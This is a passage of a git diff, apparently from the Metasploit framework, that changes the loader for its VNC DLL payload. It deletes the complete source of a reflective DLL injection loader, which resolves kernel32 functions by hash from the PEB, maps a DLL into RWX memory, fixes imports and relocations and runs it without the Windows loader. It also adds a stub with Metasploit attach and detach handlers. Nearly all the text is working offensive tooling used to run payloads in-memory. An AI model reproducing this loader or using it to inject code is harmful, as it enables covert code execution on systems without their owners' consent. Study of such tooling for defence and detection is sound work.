CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#include "LoadLibraryR.h" -//===============================================================================================// -DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress ) -{ - WORD wIndex = 0; - PIMAGE_SECTION_HEADER pSectionHeader = NULL; - PIMAGE_NT_HEADERS pNtHeaders = NULL; - - pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew); - - pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader); - - if( dwRva < pSectionHeader[0].PointerToRawData ) - return dwRva; - - for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ ) - { - if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) ) - return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData ); - } - - return 0; -} -//===============================================================================================// -DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer ) -{ - UINT_PTR uiBaseAddress = 0; - UINT_PTR uiExportDir = 0; - UINT_PTR uiNameArray = 0; - UINT_PTR uiAddressArray = 0; - UINT_PTR uiNameOrdinals = 0; - DWORD dwCounter = 0; -#ifdef _WIN64 - DWORD dwMeterpreterArch = 2; -#else - DWORD dwMeterpreterArch = 1; -#endif - - uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer; - - // get the File Offset of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // currenlty we can only process a PE file which is the same type as the one this fuction has - // been compiled as, due to various offset in the PE structures being defined at compile time. - if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32 - { - if( dwMeterpreterArch != 1 ) - return 0; - } - else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64 - { - if( dwMeterpreterArch != 2 ) - return 0; - } - else - { - return 0; - } - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the File Offset of the export directory - uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress ); - - // get the File Offset for the array of name pointers - uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress ); - - // get the File Offset for the array of addresses - uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress ); - - // get the File Offset for the array of name ordinals - uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress ); - - // get a counter for the number of exported functions... - dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames; - - // loop through all the exported functions to find the ReflectiveLoader - while( dwCounter-- ) - { - char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress )); - - if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL ) - { - // get the File Offset for the array of addresses - uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress ); - - // use the functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // return the File Offset to the ReflectiveLoader() functions code... - return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress ); - } - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - - return 0; -} -//===============================================================================================// diff --git a/external/source/vncdll/loader/LoadLibraryR.h b/external/source/vncdll/loader/LoadLibraryR.h deleted file mode 100644 index 5c1e65075f..0000000000 --- a/external/source/vncdll/loader/LoadLibraryR.h +++ /dev/null @@ -1,37 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _VNCDLL_LOADER_LOADLIBRARYR_H -#define _VNCDLL_LOADER_LOADLIBRARYR_H -//===============================================================================================// -#include "ReflectiveDLLInjection.h" - -DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer ); - -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/vncdll/loader/ReflectiveDLLInjection.h b/external/source/vncdll/loader/ReflectiveDLLInjection.h deleted file mode 100644 index d41b2ac323..0000000000 --- a/external/source/vncdll/loader/ReflectiveDLLInjection.h +++ /dev/null @@ -1,53 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H -#define _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H -//===============================================================================================// -#define WIN32_LEAN_AND_MEAN -#include - -// we declare some common stuff in here... - -#define DLL_METASPLOIT_ATTACH 4 -#define DLL_METASPLOIT_DETACH 5 -#define DLL_QUERY_HMODULE 6 - -#define DEREF( name )*(UINT_PTR *)(name) -#define DEREF_64( name )*(DWORD64 *)(name) -#define DEREF_32( name )*(DWORD *)(name) -#define DEREF_16( name )*(WORD *)(name) -#define DEREF_8( name )*(BYTE *)(name) - -typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID ); -typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID ); - -#define DLLEXPORT __declspec( dllexport ) - -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/vncdll/loader/ReflectiveDll.c b/external/source/vncdll/loader/ReflectiveDll.c new file mode 100644 index 0000000000..46d0f9e24f --- /dev/null +++ b/external/source/vncdll/loader/ReflectiveDll.c @@ -0,0 +1,73 @@ +//===============================================================================================// +// This is a stub for the actuall functionality of the DLL. +//===============================================================================================// +#include "ReflectiveLoader.h" + +#define EXITFUNC_SEH 0xEA320EFE +#define EXITFUNC_THREAD 0x0A2A1DE0 +#define EXITFUNC_PROCESS 0x56A2B5F0 + +#define DLL_METASPLOIT_ATTACH 4 +#define DLL_METASPLOIT_DETACH 5 +#define DLL_QUERY_HMODULE 6 + +// Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are +// defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own +// DllMain and use the LoadRemoteLibraryR() API to inject this DLL. + +// You can use this value as a pseudo hinstDLL value (defined and set via ReflectiveLoader.c) +extern HINSTANCE hAppInstance; +//===============================================================================================// +extern DWORD DLLEXPORT Init(SOCKET socket); + +BOOL MetasploitDllAttach(SOCKET socket) +{ + Init(socket); + return TRUE; +} + +BOOL MetasploitDllDetach(DWORD dwExitFunc) +{ + switch (dwExitFunc) + { + case EXITFUNC_SEH: + SetUnhandledExceptionFilter(NULL); + break; + case EXITFUNC_THREAD: + ExitThread(0); + break; + case EXITFUNC_PROCESS: + ExitProcess(0); + break; + default: + break; + } + + return TRUE; +} + +BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) +{ + BOOL bReturnValue = TRUE; + switch (dwReason) + { + case DLL_METASPLOIT_ATTACH: + bReturnValue = MetasploitDllAttach((SOCKET) lpReserved); + break; + case DLL_METASPLOIT_DETACH: + bReturnValue = MetasploitDllDetach((DWORD) lpReserved); + break; + case DLL_QUERY_HMODULE: + if (lpReserved != NULL) + *(HMODULE *) lpReserved = hAppInstance; + break; + case DLL_PROCESS_ATTACH: + hAppInstance = hinstDLL; + break; + case DLL_PROCESS_DETACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + break; + } + return bReturnValue; +} \ No newline at end of file diff --git a/external/source/vncdll/loader/ReflectiveLoader.c b/external/source/vncdll/loader/ReflectiveLoader.c deleted file mode 100644 index fe667a830d..0000000000 --- a/external/source/vncdll/loader/ReflectiveLoader.c +++ /dev/null @@ -1,451 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. -// -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#include "ReflectiveLoader.h" -//===============================================================================================// -// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value -HINSTANCE hAppInstance = NULL; -//===============================================================================================// -#ifdef _WIN64 -#pragma intrinsic( _ReturnAddress ) -UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); } -#endif -//===============================================================================================// - -// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN, -// otherwise the DllMain at the end of this file will be used. - -// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR, -// otherwise it is assumed you are calling the ReflectiveLoader via a stub. - -// This is our position independent reflective DLL loader/injector -#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR -DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( LPVOID lpParameter ) -#else -DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID ) -#endif -{ - // the functions we need - LOADLIBRARYA pLoadLibraryA; - GETPROCADDRESS pGetProcAddress; - VIRTUALALLOC pVirtualAlloc; - USHORT usCounter; - - // the initial location of this image in memory - UINT_PTR uiLibraryAddress; - // the kernels base address and later this images newly loaded base address - UINT_PTR uiBaseAddress; - - // variables for processing the kernels export table - UINT_PTR uiAddressArray; - UINT_PTR uiNameArray; - UINT_PTR uiExportDir; - UINT_PTR uiNameOrdinals; - DWORD dwHashValue; - - // variables for loading this image - UINT_PTR uiHeaderValue; - UINT_PTR uiValueA; - UINT_PTR uiValueB; - UINT_PTR uiValueC; - UINT_PTR uiValueD; - - // STEP 0: calculate our images current base address - - // we will start searching backwards from our current EIP -#ifdef _WIN64 - uiLibraryAddress = eip(); -#else - __asm call geteip - __asm geteip: pop uiLibraryAddress -#endif - - // loop through memory backwards searching for our images base address - // we dont need SEH style search as we shouldnt generate any access violations with this - while( TRUE ) - { - if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE ) - { - uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - // some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'), - // we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems. - if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 ) - { - uiHeaderValue += uiLibraryAddress; - // break if we have found a valid MZ/PE header - if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE ) - break; - } - } - uiLibraryAddress--; - } - - // STEP 1: process the kernels exports for the functions our loader needs... - - // get the Process Enviroment Block -#ifdef _WIN64 - uiBaseAddress = __readgsqword( 0x60 ); -#else - uiBaseAddress = __readfsdword( 0x30 ); -#endif - - // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx - uiBaseAddress = (UINT_PTR)((_PPEB)uiBaseAddress)->pLdr; - - // get the first entry of the InMemoryOrder module list - uiValueA = (UINT_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink; - while( uiValueA ) - { - // get pointer to current modules name (unicode string) - uiValueB = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer; - // set bCounter to the length for the loop - usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length; - // clear uiValueC which will store the hash of the module name - uiValueC = 0; - // compute the hash of the module name... - do - { - uiValueC = ror( (DWORD)uiValueC ); - // normalize to uppercase if the madule name is in lowercase - if( *((BYTE *)uiValueB) >= 'a' ) - uiValueC += *((BYTE *)uiValueB) - 0x20; - else - uiValueC += *((BYTE *)uiValueB); - uiValueB++; - } while( --usCounter ); - // compare the hash with that of kernel32.dll - if( (DWORD)uiValueC == KERNEL32DLL_HASH ) - { - // get this modules base address - uiBaseAddress = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; - break; - } - // get the next entry - uiValueA = DEREF( uiValueA ); - } - - // get the VA of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of name pointers - uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals ); - - usCounter = 3; - - // loop while we still have imports to find - while( usCounter > 0 ) - { - // compute the hash values for this function name - dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); - - // if we have found a function we want we get its virtual address - if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH ) - { - // get the VA for the array of addresses - uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use this functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // store this functions VA - if( dwHashValue == LOADLIBRARYA_HASH ) - pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == GETPROCADDRESS_HASH ) - pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == VIRTUALALLOC_HASH ) - pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - - // decrement our counter - usCounter--; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - - // STEP 2: load our image into a new permanent location in memory... - - // get the VA of the NT Header for the PE to be loaded - uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // allocate all the memory for the DLL to be loaded into. we can load at any address because we will - // relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems. - uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); - - // we must now copy over the headers - uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders; - uiValueB = uiLibraryAddress; - uiValueC = uiBaseAddress; - __movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA ); - - // STEP 3: load in all of our sections... - - // uiValueA = the VA of the first section - uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader ); - - // itterate through all sections, loading them into memory. - while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- ) - { - // uiValueB is the VA for this section - uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress ); - - // uiValueC if the VA for this sections data - uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData ); - - // copy the section over - uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData; - __movsb( (PBYTE)uiValueB, (PBYTE)uiValueC, uiValueD ); - - // get the VA of the next section - uiValueA += sizeof( IMAGE_SECTION_HEADER ); - } - - // STEP 4: process our images import table... - - // uiValueB = the address of the import directory - uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ]; - - // we assume their is an import table to process - // uiValueC is the first entry in the import table - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // itterate through all imports - while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) - { - // use LoadLibraryA to load the imported module into memory - uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) ); - - // uiValueD = VA of the OriginalFirstThunk - uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk ); - - // uiValueA = VA of the IAT (via first thunk not origionalfirstthunk) - uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk ); - - // itterate through all imported functions, importing by ordinal if no name present - while( DEREF(uiValueA) ) - { - // sanity check uiValueD as some compilers only import by FirstThunk - if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG ) - { - // get the VA of the modules NT Header - uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of addresses - uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use the import ordinal (- export ordinal base) as an index into the array of addresses - uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) ); - - // patch in the address for this imported function - DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) ); - } - else - { - // get the VA of this functions import by name struct - uiValueB = ( uiBaseAddress + DEREF(uiValueA) ); - - // use GetProcAddress and patch in the address for this imported function - DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name ); - } - // get the next imported function - uiValueA += sizeof( UINT_PTR ); - if( uiValueD ) - uiValueD += sizeof( UINT_PTR ); - } - - // get the next import - uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR ); - } - - // STEP 5: process all of our images relocations... - - // calculate the base address delta and perform relocations (even if we load at desired image base) - uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase; - - // uiValueB = the address of the relocation directory - uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ]; - - // check if their are any relocations present - if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size ) - { - // uiValueC is now the first entry (IMAGE_BASE_RELOCATION) - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // and we itterate through all entries... - while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock ) - { - // uiValueA = the VA for this relocation block - uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress ); - - // uiValueB = number of entries in this relocation block - uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC ); - - // uiValueD is now the first entry in the current relocation block - uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION); - - // we itterate through all the entries in the current block... - while( uiValueB-- ) - { - // perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required. - // we dont use a switch statement to avoid the compiler building a jump table - // which would not be very position independent! - if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 ) - *(UINT_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress; - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW ) - *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress; - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress); - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress); - - // get the next entry in the current relocation block - uiValueD += sizeof( IMAGE_RELOC ); - } - - // get the next entry in the relocation directory - uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock; - } - } - - // STEP 6: process the images exception directory if it has one (PE32+ for x64) -/* - // uiValueB = the address of the relocation directory - uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXCEPTION ]; - // check if their are any exception etries present - if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size ) - { - // get the number of entries - uiValueA = ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size / sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY ); - - // uiValueC is now the first entry (IMAGE_RUNTIME_FUNCTION_ENTRY) - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // itterate through all entries - while( uiValueA-- ) - { - //((IMAGE_RUNTIME_FUNCTION_ENTRY)uiValueC).BeginAddress - - // get the next entry - uiValueC += sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY ); - } - } -*/ - // STEP 7: call our images entry point - - // uiValueA = the VA of our newly loaded DLL/EXE's entry point - uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint ); - - // call our respective entry point, fudging our hInstance value -#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR - // if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter) - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter ); -#else - // if we are injecting an DLL via a stub we call DllMain with no parameter - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL ); -#endif - - // STEP 8: return our new entry point address so whatever called us can call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH - return uiValueA; -} -//===============================================================================================// -#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN - -// you must implement this function... -extern DWORD DLLEXPORT Init( SOCKET socket ); - -BOOL MetasploitDllAttach( SOCKET socket ) -{ - Init( socket ); - return TRUE; -} - -BOOL MetasploitDllDetach( DWORD dwExitFunc ) -{ - switch( dwExitFunc ) - { - case EXITFUNC_SEH: - SetUnhandledExceptionFilter( NULL ); - break; - case EXITFUNC_THREAD: - ExitThread( 0 ); - break; - case EXITFUNC_PROCESS: - ExitProcess( 0 ); - break; - default: - break; - } - - return TRUE; -} - -BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) -{ - BOOL bReturnValue = TRUE; - switch( dwReason ) - { - case DLL_METASPLOIT_ATTACH: - bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved ); - break; - case DLL_METASPLOIT_DETACH: - bReturnValue = MetasploitDllDetach( (DWORD)lpReserved ); - break; - case DLL_QUERY_HMODULE: - if( lpReserved != NULL ) - *(HMODULE *)lpReserved = hAppInstance; - break; - case DLL_PROCESS_ATTACH: - hAppInstance = hinstDLL; - break; - case DLL_PROCESS_DETACH: - case DLL_THREAD_ATTACH: - case DLL_THREAD_DETACH: - break; - } - return bReturnValue; -} - -#endif 